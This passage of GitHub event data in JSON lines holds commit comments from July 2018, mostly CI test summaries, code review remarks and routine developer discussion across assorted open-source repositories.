{"id":"7965742475","type":"CommitCommentEvent","actor":{"login":"annyaj"},"repo":{"name":"annyaj/cplusplus"},"payload":{"comment":{"id":29709204,"position":null,"line":null,"path":null,"commit_id":"dfbecc261078b0f51ea70fdbef689229115ce672","created_at":"2018-07-14T12:54:24Z","updated_at":"2018-07-14T12:54:24Z","author_association":"OWNER","body":"Нифига ты мощный"}},"created_at":"2018-07-14T12:54:24Z"}
{"id":"7965742892","type":"CommitCommentEvent","actor":{"login":"annyaj"},"repo":{"name":"annyaj/cplusplus"},"payload":{"comment":{"id":29709207,"position":4,"line":55,"path":"Consol/Stack.cpp","commit_id":"dfbecc261078b0f51ea70fdbef689229115ce672","created_at":"2018-07-14T12:54:48Z","updated_at":"2018-07-14T12:54:48Z","author_association":"OWNER","body":"Надо добавить реализацию без параметра"}},"created_at":"2018-07-14T12:54:48Z"}
{"id":"7965744464","type":"CommitCommentEvent","actor":{"login":"CupIvan"},"repo":{"name":"hyperboria/peers"},"payload":{"comment":{"id":29709209,"position":null,"line":null,"path":null,"commit_id":"b51b9be3d4612d4403fa256faf585c068fc95c1c","created_at":"2018-07-14T12:56:09Z","updated_at":"2018-07-14T12:56:09Z","author_association":"NONE","body":"Hi! Last online was 2018-05-31, is it working or not?"}},"created_at":"2018-07-14T12:56:09Z"}
{"id":"7965745203","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29709212,"position":null,"line":null,"path":null,"commit_id":"3d9f8454ba627505f373db5b6f6ab1ae283a5187","created_at":"2018-07-14T12:56:45Z","updated_at":"2018-07-14T12:56:45Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - x86_64-MacOS-10.9-clang: OK (2779 of 2940 tests passed, 10 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 131 tests had: EIO diffs.\n * 96 tests had: ESO big diffs.\n * 160 tests had: Table big diffs.\n * 23 tests had: ERR diffs.\n * 58 tests had: MTR big diffs.\n * 21 tests had: ESO small diffs.\n * 17 tests had: MTR small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 462\n * Failed: 161\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3d9f8454ba627505f373db5b6f6ab1ae283a5187-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3d9f8454ba627505f373db5b6f6ab1ae283a5187-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-94.52%25-yellow.png)</a> \n"}},"created_at":"2018-07-14T12:56:45Z"}
{"id":"7965746487","type":"CommitCommentEvent","actor":{"login":"artola"},"repo":{"name":"facebook/jest"},"payload":{"comment":{"id":29709214,"position":null,"line":null,"path":null,"commit_id":"ce52523289a8f624a6135b7d8f1a766d741ccd6f","created_at":"2018-07-14T12:57:42Z","updated_at":"2018-07-14T12:57:42Z","author_association":"NONE","body":"@mjesun A question: could you give me some info regarding the change in `lerna.json` about`\"npmClient\": \"npm\"`? ... some motivation to move from `yarn`?\r\n\r\nPS: te agradeceria cualquier consejo respecto a `yarn` vs `npm`  como client recomendado (performance, compatibilidad, etc)."}},"created_at":"2018-07-14T12:57:42Z"}
{"id":"7965747058","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29709215,"position":null,"line":null,"path":null,"commit_id":"26f1e83eeeb323772e9f31bcda961d2f2af216e3","created_at":"2018-07-14T12:58:10Z","updated_at":"2018-07-14T12:58:10Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2789 of 2977 tests passed, 439 test warnings)\n\nMessages:\n\n * 627 tests had: AUD diffs.\n * 227 tests had: EIO diffs.\n * 75 tests had: ESO big diffs.\n * 174 tests had: Table big diffs.\n * 167 tests had: ESO small diffs.\n * 103 tests had: MTR small diffs.\n * 35 tests had: MTR big diffs.\n * 61 tests had: Table small diffs.\n * 17 tests had: ERR diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 456\n * Failed: 188\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-26f1e83eeeb323772e9f31bcda961d2f2af216e3-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-26f1e83eeeb323772e9f31bcda961d2f2af216e3-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.68%25-yellow.png)</a> \n"}},"created_at":"2018-07-14T12:58:10Z"}
{"id":"7965748248","type":"CommitCommentEvent","actor":{"login":"lzwanenberg"},"repo":{"name":"rubocop-hq/rails-style-guide"},"payload":{"comment":{"id":29709219,"position":null,"line":null,"path":null,"commit_id":"9acffadd2ab054fb6bb2282221db0d244a66816e","created_at":"2018-07-14T12:59:14Z","updated_at":"2018-07-14T12:59:14Z","author_association":"NONE","body":"typo: 'referenece' -> 'reference'"}},"created_at":"2018-07-14T12:59:14Z"}
{"id":"7965753300","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29709229,"position":null,"line":null,"path":null,"commit_id":"26f1e83eeeb323772e9f31bcda961d2f2af216e3","created_at":"2018-07-14T13:03:17Z","updated_at":"2018-07-14T13:03:17Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-26f1e83eeeb323772e9f31bcda961d2f2af216e3-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-14T13:03:17Z"}
{"id":"7965754801","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29709234,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-14T13:04:40Z","updated_at":"2018-07-14T13:04:40Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - i386-Windows-7-VisualStudio-14: Tests Failed (2363 of 2924 tests passed, 62 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 502 tests had: ESO small diffs.\n * 557 tests had: Table big diffs.\n * 359 tests had: MTR small diffs.\n * 1 test had: BND diffs.\n * 85 tests had: ESO big diffs.\n * 102 tests had: AUD diffs.\n * 41 tests had: MTR big diffs.\n * 27 tests had: ERR diffs.\n * 23 tests had: ZSZ small diffs.\n * 2 tests had: MTD diffs.\n * 9 tests had: SSZ small diffs.\n * 3 tests had: Table small diffs.\n * 3 tests had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 62\n * Failed: 561\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.81%25-red.png)</a> \n"}},"created_at":"2018-07-14T13:04:40Z"}
{"id":"7965757569","type":"CommitCommentEvent","actor":{"login":"tosiah"},"repo":{"name":"tosiah/lecture0"},"payload":{"comment":{"id":29709239,"position":null,"line":null,"path":null,"commit_id":"e8b09b6dfc34cbf4318a7ac159fa17a8610b9245","created_at":"2018-07-14T13:06:59Z","updated_at":"2018-07-14T13:06:59Z","author_association":"OWNER","body":"Add a third line"}},"created_at":"2018-07-14T13:06:59Z"}
{"id":"7965758998","type":"CommitCommentEvent","actor":{"login":"BaCoNL"},"repo":{"name":"tronscan/tronscan-frontend"},"payload":{"comment":{"id":29709241,"position":null,"line":null,"path":null,"commit_id":"cbd8b93dcb89264c041a9be94e1e4c51d2c15c91","created_at":"2018-07-14T13:08:13Z","updated_at":"2018-07-14T13:08:13Z","author_association":"CONTRIBUTOR","body":"fix #275 "}},"created_at":"2018-07-14T13:08:13Z"}
{"id":"7965765083","type":"CommitCommentEvent","actor":{"login":"jdidion"},"repo":{"name":"dnanexus/dx_ritchie"},"payload":{"comment":{"id":29709252,"position":null,"line":null,"path":null,"commit_id":"1ecb176bcf86c0fcfbe5b88f6ef7d19964173caa","created_at":"2018-07-14T13:13:13Z","updated_at":"2018-07-14T13:13:13Z","author_association":"COLLABORATOR","body":"Thanks Yih-Chii, I'll check in these changes and my test script to a new vcf_annotate branch."}},"created_at":"2018-07-14T13:13:13Z"}
{"id":"7965765987","type":"CommitCommentEvent","actor":{"login":"MicathonTracker"},"repo":{"name":"Micathon3/Zeus-Web"},"payload":{"comment":{"id":29709253,"position":null,"line":null,"path":null,"commit_id":"1115d8a677ebb920b74e2c568b773b65dd7496d5","created_at":"2018-07-14T13:14:02Z","updated_at":"2018-07-14T13:14:02Z","author_association":"NONE","body":"@StellarDoor5319, you have been rewarded **1.8 XP** for creating this commit. Keep up the good work! You now have a total of 1.8 XP.\n---\nIn case you didn't know, MicathonTracker is a robot that gives Micathon members XP for GitHub activities, which we use to measure leaderboards and other statistics between us. It is only awarded to Micathon members, and only in Micathon repositories."}},"created_at":"2018-07-14T13:14:02Z"}
{"id":"7965768843","type":"CommitCommentEvent","actor":{"login":"Abhinavgupta371"},"repo":{"name":"lettuce-oreo/android_device_yu_lettuce"},"payload":{"comment":{"id":29709261,"position":null,"line":null,"path":null,"commit_id":"23d00e79a73f276079bac52645dfbf371e1259c5","created_at":"2018-07-14T13:16:24Z","updated_at":"2018-07-14T13:16:24Z","author_association":"NONE","body":"Stop barking"}},"created_at":"2018-07-14T13:16:24Z"}
{"id":"7965769122","type":"CommitCommentEvent","actor":{"login":"d2phap"},"repo":{"name":"d2phap/ImageGlass"},"payload":{"comment":{"id":29709262,"position":null,"line":null,"path":null,"commit_id":"52d6aeca5361f5b1fe1958b858daf2f942acc4a8","created_at":"2018-07-14T13:16:37Z","updated_at":"2018-07-14T13:16:37Z","author_association":"OWNER","body":"There are 2 issues:\r\n- Swatcher still keeps on running on background after closing the app (asking the author https://github.com/bravelantern/Swatcher/issues/8).\r\n- When edit an image, Swatcher throw 2 events: `delete` and `create`. This depends on the editing app. Some apps delete the old file and create new one."}},"created_at":"2018-07-14T13:16:37Z"}
{"id":"7965769286","type":"CommitCommentEvent","actor":{"login":"souhilahana"},"repo":{"name":"EIT-ICT-RICH/ns-3-dev-TSCH"},"payload":{"comment":{"id":29709263,"position":35,"line":35,"path":"AUTHORS","commit_id":"d314cbdce2877d9a92a9e068880bcae43506e886","created_at":"2018-07-14T13:16:45Z","updated_at":"2018-07-14T13:16:45Z","author_association":"NONE","body":"Hi\r\nCAN I IMPLEMENT TSCH MODE IN NS2"}},"created_at":"2018-07-14T13:16:45Z"}
{"id":"7965770143","type":"CommitCommentEvent","actor":{"login":"hariexcel"},"repo":{"name":"vechain/thor"},"payload":{"comment":{"id":29709267,"position":null,"line":null,"path":null,"commit_id":"9668109b8eaf6c354b71c6a4288e36bf814184c6","created_at":"2018-07-14T13:17:14Z","updated_at":"2018-07-14T13:17:14Z","author_association":"NONE","body":"Added test file for nodes in p2p"}},"created_at":"2018-07-14T13:17:14Z"}
{"id":"7965772782","type":"CommitCommentEvent","actor":{"login":"object"},"repo":{"name":"phatcher/Simple.OData.Client"},"payload":{"comment":{"id":29709269,"position":null,"line":null,"path":null,"commit_id":"8f5adf809992423bc6f8d543bd0875027d020125","created_at":"2018-07-14T13:19:16Z","updated_at":"2018-07-14T13:19:16Z","author_association":"NONE","body":"I've extended ODataClientSettings with async versions of BeforeRequest and AfterReponse."}},"created_at":"2018-07-14T13:19:16Z"}
{"id":"7965774292","type":"CommitCommentEvent","actor":{"login":"fredbuluku"},"repo":{"name":"hitbtc-com/hitbtc-api"},"payload":{"comment":{"id":29709273,"position":null,"line":null,"path":null,"commit_id":"192f402451aa8b158199bfef867c2a99ca8069f9","created_at":"2018-07-14T13:20:29Z","updated_at":"2018-07-14T13:20:29Z","author_association":"NONE","body":"> solve the problems on my account \r\n\r\n> I lost my authentication code\r\n\r\n> let me get access \r\n\r\n> git"}},"created_at":"2018-07-14T13:20:29Z"}
{"id":"7965774637","type":"CommitCommentEvent","actor":{"login":"MeridianOXC"},"repo":{"name":"ohartenstein23/OpenXcom"},"payload":{"comment":{"id":29709274,"position":8,"line":103,"path":"src/Savegame/Soldier.h","commit_id":"1908d9d07268b0cf96a064233d7a3acf2424fb12","created_at":"2018-07-14T13:20:46Z","updated_at":"2018-07-14T13:20:46Z","author_association":"NONE","body":"I'll just change the name to getRankSpriteBattle, so that the prefix is the same... helps me (and hopefully other devs) during autocomplete to notice immediately there are multiple versions."}},"created_at":"2018-07-14T13:20:46Z"}
{"id":"7965774899","type":"CommitCommentEvent","actor":{"login":"Atemo"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29709275,"position":null,"line":null,"path":null,"commit_id":"cd05eb1500eaba2e6bb184754c6a49b1b654e81c","created_at":"2018-07-14T13:20:57Z","updated_at":"2018-07-14T13:20:57Z","author_association":"MEMBER","body":"The build check passed.. :exclamation:\r\nMaybe open an issue - and fill the template."}},"created_at":"2018-07-14T13:20:57Z"}
{"id":"7965785875","type":"CommitCommentEvent","actor":{"login":"djc"},"repo":{"name":"ivasic/abna"},"payload":{"comment":{"id":29709312,"position":null,"line":null,"path":null,"commit_id":"f593203178a99c392fb9486fcf24472df57bc6aa","created_at":"2018-07-14T13:29:51Z","updated_at":"2018-07-14T13:29:51Z","author_association":"NONE","body":"I'm not that worried about backwards compatibility at this stage, there probably aren't that many people using it. I'll also write up a changelog for the 0.2 release to describe the change. So yes, please go ahead (and make `iban` mandatory)!"}},"created_at":"2018-07-14T13:29:51Z"}
{"id":"7965785941","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29709313,"position":null,"line":null,"path":null,"commit_id":"10ee08cffefc055530852360358ccddbe91bb6d2","created_at":"2018-07-14T13:29:53Z","updated_at":"2018-07-14T13:29:53Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#pr-5](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#pr-5).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-5-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-14T13:29:53Z"}
{"id":"7965788364","type":"CommitCommentEvent","actor":{"login":"mjesun"},"repo":{"name":"facebook/jest"},"payload":{"comment":{"id":29709317,"position":null,"line":null,"path":null,"commit_id":"ce52523289a8f624a6135b7d8f1a766d741ccd6f","created_at":"2018-07-14T13:31:45Z","updated_at":"2018-07-14T13:31:45Z","author_association":"CONTRIBUTOR","body":"We've had some issues when releasing the last patch with `yarn` due to the enforcement of 2FA over NPM. I've already raised it internally, and I think @bestander and @arcanis are aware of it. TBH I wasn't intending of commiting that into `master`, but looks like I sneaked it 😅\r\n\r\nAt Facebook we heavily use Yarn, so I'm probably a little bit biased if I have to give you advice. 😜"}},"created_at":"2018-07-14T13:31:45Z"}
{"id":"7965789872","type":"CommitCommentEvent","actor":{"login":"faiyazsheth"},"repo":{"name":"lite-os-devices/device_xiaomi_whyred"},"payload":{"comment":{"id":29709319,"position":null,"line":null,"path":null,"commit_id":"add68c1e3812f04534e4a402fa08d26fea90f07f","created_at":"2018-07-14T13:32:55Z","updated_at":"2018-07-14T13:32:55Z","author_association":"NONE","body":"There goes the precious authorship. Bhai..."}},"created_at":"2018-07-14T13:32:55Z"}
{"id":"7965790905","type":"CommitCommentEvent","actor":{"login":"GeniusYYF"},"repo":{"name":"GeniusYYF/sms1.0"},"payload":{"comment":{"id":29709320,"position":null,"line":null,"path":null,"commit_id":"99236296f4eb0d426573adc0271897167e1b787a","created_at":"2018-07-14T13:33:41Z","updated_at":"2018-07-14T13:33:41Z","author_association":"OWNER","body":"Nice!"}},"created_at":"2018-07-14T13:33:41Z"}
{"id":"7965790968","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29709321,"position":null,"line":null,"path":null,"commit_id":"074622c7035915fc092579483216a651bc2a8576","created_at":"2018-07-14T13:33:45Z","updated_at":"2018-07-14T13:33:45Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#pr-5](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#pr-5).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-5-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-14T13:33:45Z"}
{"id":"7965791822","type":"CommitCommentEvent","actor":{"login":"clemsciences"},"repo":{"name":"cltk/cltk"},"payload":{"comment":{"id":29709322,"position":55,"line":66,"path":"cltk/phonology/syllabify.py","commit_id":"a2326070b5f06165502dd52e2e3f61d087a92654","created_at":"2018-07-14T13:34:27Z","updated_at":"2018-07-14T13:34:27Z","author_association":"MEMBER","body":"I think \r\n```python\r\nreturn [onset for onset, i in onset_dict if i/n > threshold]\r\n```\r\nis correct and more concise."}},"created_at":"2018-07-14T13:34:27Z"}
{"id":"7965793599","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29709324,"position":null,"line":null,"path":null,"commit_id":"26f1e83eeeb323772e9f31bcda961d2f2af216e3","created_at":"2018-07-14T13:35:50Z","updated_at":"2018-07-14T13:35:50Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1687 of 1687 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-26f1e83eeeb323772e9f31bcda961d2f2af216e3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-26f1e83eeeb323772e9f31bcda961d2f2af216e3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-26f1e83eeeb323772e9f31bcda961d2f2af216e3-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-14T13:35:50Z"}
{"id":"7965794213","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29709325,"position":null,"line":null,"path":null,"commit_id":"7ca499d49eb3fa8d943aef363142c951af170810","created_at":"2018-07-14T13:36:20Z","updated_at":"2018-07-14T13:36:20Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#pr-5](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#pr-5).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-5-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-14T13:36:20Z"}
{"id":"7965794884","type":"CommitCommentEvent","actor":{"login":"kimocoder"},"repo":{"name":"fariouche/rtl8812au-1"},"payload":{"comment":{"id":29709329,"position":null,"line":null,"path":null,"commit_id":"9175cd68dbf383f27a178b054ba3369e93d4a00b","created_at":"2018-07-14T13:36:54Z","updated_at":"2018-07-14T13:36:54Z","author_association":"NONE","body":"@fariouche \r\n\r\nThere is a bug somewhere, so it won't connect to networks anymore.. trying to investigate the issue, but can't seem to find it. Your v5.2.20 version works, while our v5.2.20.2 version does not work :/\r\n\r\nI cleaned out the v5.2.20.2 repo with a fresh fork from \"gordboy\", I think maybe one of my earlier working patches actually may have destroyed something somewhere, so the best thing I came up with was to re-initiate a clean build again. My thought is that the first thing to have, is working chipset support, from there the frame injection support and monitor mode patches is easy. Sent you a mail about it.\r\n\r\nLet me know your thoughs to the matter :)"}},"created_at":"2018-07-14T13:36:54Z"}
{"id":"7965797822","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29709330,"position":null,"line":null,"path":null,"commit_id":"7a86063a518b6df11c6541f30b629cd00e55b33c","created_at":"2018-07-14T13:39:07Z","updated_at":"2018-07-14T13:39:07Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#pr-5](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#pr-5).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-5-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-14T13:39:07Z"}
{"id":"7965797832","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29709331,"position":null,"line":null,"path":null,"commit_id":"baec318e64b5b0e5eded1dbf3cd97f445d5aeb98","created_at":"2018-07-14T13:39:07Z","updated_at":"2018-07-14T13:39:07Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#pr-5](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#pr-5).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-5-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-14T13:39:07Z"}
{"id":"7965798246","type":"CommitCommentEvent","actor":{"login":"BigDataSpeech"},"repo":{"name":"BigDataSpeech/TP"},"payload":{"comment":{"id":29709332,"position":null,"line":null,"path":null,"commit_id":"a9c5fd8abae90e34d02f3fe777ae085bd8f6380f","created_at":"2018-07-14T13:39:28Z","updated_at":"2018-07-14T13:39:28Z","author_association":"OWNER","body":"Nico données"}},"created_at":"2018-07-14T13:39:28Z"}
{"id":"7965805015","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29709338,"position":null,"line":null,"path":null,"commit_id":"7128b1fcff620f11c2ba8476bd9d3311fa88d5e0","created_at":"2018-07-14T13:44:54Z","updated_at":"2018-07-14T13:44:54Z","author_association":"NONE","body":"use_eigen_HeatBalanceIntRadExchange (drewyh) - Win64-Windows-7-VisualStudio-14: Tests Failed (2363 of 2924 tests passed, 62 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 501 tests had: ESO small diffs.\n * 557 tests had: Table big diffs.\n * 360 tests had: MTR small diffs.\n * 1 test had: BND diffs.\n * 85 tests had: ESO big diffs.\n * 102 tests had: AUD diffs.\n * 41 tests had: MTR big diffs.\n * 27 tests had: ERR diffs.\n * 2 tests had: MTD diffs.\n * 12 tests had: SSZ small diffs.\n * 19 tests had: ZSZ small diffs.\n * 3 tests had: Table small diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 62\n * Failed: 561\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7128b1fcff620f11c2ba8476bd9d3311fa88d5e0-PR6737-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-80.81%25-red.png)</a> \n"}},"created_at":"2018-07-14T13:44:54Z"}
{"id":"7965805592","type":"CommitCommentEvent","actor":{"login":"ModulesUnraveled"},"repo":{"name":"ModulesUnraveled/digitalartteacher"},"payload":{"comment":{"id":29709342,"position":null,"line":null,"path":null,"commit_id":"7d18528ae6ebf0f1ab22bb5a8fc1f061f4efbfe1","created_at":"2018-07-14T13:45:20Z","updated_at":"2018-07-14T13:45:20Z","author_association":"OWNER","body":"Created multidev environment [digitalartteacher#pr-6](https://dashboard.pantheon.io/sites/a1a39465-2598-4d1c-9c37-d19647b48566#pr-6).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-6-digitalartteacher.pantheonsite.io/)"}},"created_at":"2018-07-14T13:45:20Z"}
{"id":"7965806041","type":"CommitCommentEvent","actor":{"login":"kushtej"},"repo":{"name":"kushtej/cse"},"payload":{"comment":{"id":29709343,"position":null,"line":null,"path":null,"commit_id":"7990a1d6c22fe7edbcc17d62a2bdec1d8f8692ad","created_at":"2018-07-14T13:45:40Z","updated_at":"2018-07-14T13:45:40Z","author_association":"OWNER","body":"lo ninhatra mitt logo du png file idre adunnu add maadu next commit nalli"}},"created_at":"2018-07-14T13:45:40Z"}
{"id":"7965806607","type":"CommitCommentEvent","actor":{"login":"pcordes"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":29709347,"position":null,"line":null,"path":null,"commit_id":"28e20d6e5f920e48688c71456f9392a4a5f78135","created_at":"2018-07-14T13:46:08Z","updated_at":"2018-07-14T13:46:08Z","author_association":"NONE","body":"It makes little sense to define a function *inside* another function (`ASL(SHA512_Round)` ).\r\n\r\nPut this definition at global scope so it doesn't get duplicated if optimization (including link-time optimization) clones or inlines `SHA512_HashBlock_SSE2`.\r\n\r\nIDK why this namespace change would affect optimization choices, though.  Unless it changes symbol-interposition assumptions when compiling with `-fPIC`.  e.g. with the namespace, it allows the compiler to inline like `static` would, while at global scope the callers have to assume that it could be replaced with an `LD_PRELOAD=foo.so` or just normal dynamic-linking stuff.\r\n\r\nNot sure if that makes sense because the comment here doesn't mention `-fPIC`, and even if `-fPIE` is the default it doesn't include shared-library symbol-interposition assumptions, IIRC.\r\n\r\nGiven that it's an assembler message, it looks like the compiler is just doing its job and optimizing aggressively.  (I'm not sure it \"knows\" how big an `asm` statement is: I've definitely seen gcc inline or unroll with an asm statement more aggressively than with equivalent C that produces as much asm.)"}},"created_at":"2018-07-14T13:46:08Z"}
{"id":"7965807001","type":"CommitCommentEvent","actor":{"login":"liuzzom"},"repo":{"name":"liuzzom/unisound"},"payload":{"comment":{"id":29709348,"position":14,"line":14,"path":"js/client/login_and_signup/modifyemail.js","commit_id":"78f7b282da38b48ca699d305511ada2fa03ce100","created_at":"2018-07-14T13:46:27Z","updated_at":"2018-07-14T13:46:27Z","author_association":"OWNER","body":"Preferisco che il bottone non compaia nemmeno, dato che nel form della registrazione dava problemi con il disable (finiva in un zona troppo in basso e non si poteva scendere) e per motivi di coerenza avevo disattivato in tutti"}},"created_at":"2018-07-14T13:46:27Z"}
{"id":"7965809670","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.tools"},"payload":{"comment":{"id":29709355,"position":null,"line":null,"path":null,"commit_id":"c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e","created_at":"2018-07-14T13:48:34Z","updated_at":"2018-07-14T13:48:34Z","author_association":"NONE","body":"[inst/examples/example_distanceFromEachPoint.R:37:2:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/inst/examples/example_distanceFromEachPoint.R#L37) *style:* **Commented code should be removed.**\n```r\n​#beginCluster(3) # can do parallel\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_distanceFromEachPoint.R:40:2:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/inst/examples/example_distanceFromEachPoint.R#L40) *style:* **Commented code should be removed.**\n```r\n​#endCluster() # if beginCluster was run\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:82:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L82) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( method != \"RMexp\") {\n        ^\n```\n[R/initialize.R:237:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/initialize.R#L237) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  X <- c(jitter(sort(rbeta(nPoints, betaPar, betaPar) * (maxX - minX) + minX)),\n  